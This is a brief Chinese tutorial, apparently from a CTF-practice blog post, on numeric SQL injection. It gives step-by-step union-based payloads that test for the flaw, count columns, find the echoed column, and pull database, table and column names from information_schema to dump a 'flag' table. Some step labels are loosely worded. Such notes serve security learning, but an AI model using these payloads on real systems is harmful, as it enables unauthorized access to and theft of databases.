数字型注入
数字型注入
第一步:
id = 1 or 1=1 或者 id = -1 or 1=1 检查是否有漏洞 防火墙检测:id=1 and 1=1、id=1 and 1=2
第二步:
确认当前数据库的列数:?id=1+order+by+2 或者 ?id=-1+order+by+2 查是不是两列,报错就不是
第三步:
?id=-1+union+select+1,2 联合注入找回显:看数据库返回的是列 这里是判断回显是1或者2
如果第三步发现屏幕上出现的是数字 2,那你必须写 union select 1, database()。
第四步:爆破当前的表名
?id=-1+union+select+database(),2 、
第五步:找当前数据库里面有什么表-1+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema= 'sqli'
这里的sqli是上一步爆破的表名字。
第六步:确认这个表有多少列 -1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name= 'flag'
第七步:拿flag的数据
-1+union+select+1,flag+from+flag

浙公网安备 33010602011771号